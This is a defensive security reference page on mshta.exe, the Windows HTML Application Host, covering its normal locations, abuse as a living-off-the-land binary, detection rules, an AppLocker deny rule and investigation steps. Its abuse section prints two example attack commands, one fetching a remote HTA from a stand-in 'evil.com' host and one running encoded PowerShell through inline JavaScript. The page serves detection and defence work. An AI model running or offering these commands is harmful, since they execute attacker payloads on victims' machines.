anavem.
High RiskWindowsLegitimateCommonly Abused
mshta.exeSYSTEM UTILITY

mshta.exe - HTML Application Host Security Analysis

mshta.exe executes HTML Applications (.HTA files). It is a **critical LOLBin** abused for executing remote payloads, bypassing application controls, and phishing attacks. Any network activity or execution from URLs is highly suspicious.

Risk Summary

HIGH priority. mshta.exe executing URLs or remote content is a strong indicator of compromise. Block mshta.exe for non-administrative users if possible.

Overview

What is mshta.exe?

mshta.exe is the Microsoft HTML Application Host, executing .HTA files.

Security Significance

  • LOLBin: Living-off-the-Land Binary
  • Remote Execution: Can execute HTA from URLs
  • Script Execution: Runs VBScript/JScript
  • Defense Evasion: Bypasses script restrictions

Normal Behavior

Normal Behavior

PropertyExpected Value
PathC:\Windows\System32\mshta.exe
Path (32-bit)C:\Windows\SysWOW64\mshta.exe
UsageRare in enterprise environments

Common Locations

C:\Windows\System32\mshta.exeC:\Windows\SysWOW64\mshta.exe

Suspicious Indicators

Suspicious Indicators

IndicatorRisk
URL in command lineCRITICAL
VBScript/JScript inlineCRITICAL
Parent is Office appCRITICAL
Network connectionsHIGH

Abuse Techniques

Attack Techniques

Remote HTA Execution

mshta.exe http://evil.com/payload.hta
mshta.exe "javascript:a=(new ActiveXObject('Wscript.Shell')).Run('powershell -enc ...');"

Phishing Delivery

HTA files sent via email or downloaded from malicious sites.

Detection Guidance

Detection

mshta.exe CommandLine CONTAINS "http" → ALERT: CRITICAL
mshta.exe CommandLine CONTAINS "javascript:" → ALERT: CRITICAL
mshta.exe Parent = Office apps → ALERT: CRITICAL

Block via AppLocker

<FilePathRule Action="Deny">
  <Conditions>
    <FilePathCondition Path="%SYSTEM32%\mshta.exe"/>
  </Conditions>
</FilePathRule>

Remediation Steps

  1. Block mshta.exe for standard users
  2. Monitor all mshta.exe execution
  3. Analyze command-line arguments
  4. Check for downloaded payloads

Investigation Checklist

  • Check command line for URLs
  • Review parent process
  • Check network connections
  • Analyze any downloaded files
  • Look for persistence mechanisms

MITRE ATT&CK Techniques

T1218.005T1059.007T1566

Related Windows Files

EXCEL.EXEhigh

EXCEL.EXE is **Microsoft Excel**, the spreadsheet application and a **primary malware delivery vecto...

Commonly Abused
everything.exelow

Everything is a fast file search utility by Voidtools. Attackers may use it for rapid file discovery...

expressvpn.exemedium

ExpressVPN is a commercial VPN service client. While legitimate for privacy, it can be abused for C2...

hitmanpro.exelow

HitmanPro is a portable anti-malware scanner from Sophos. It uses cloud-based behavioral analysis to...

Last verified: January 18, 2026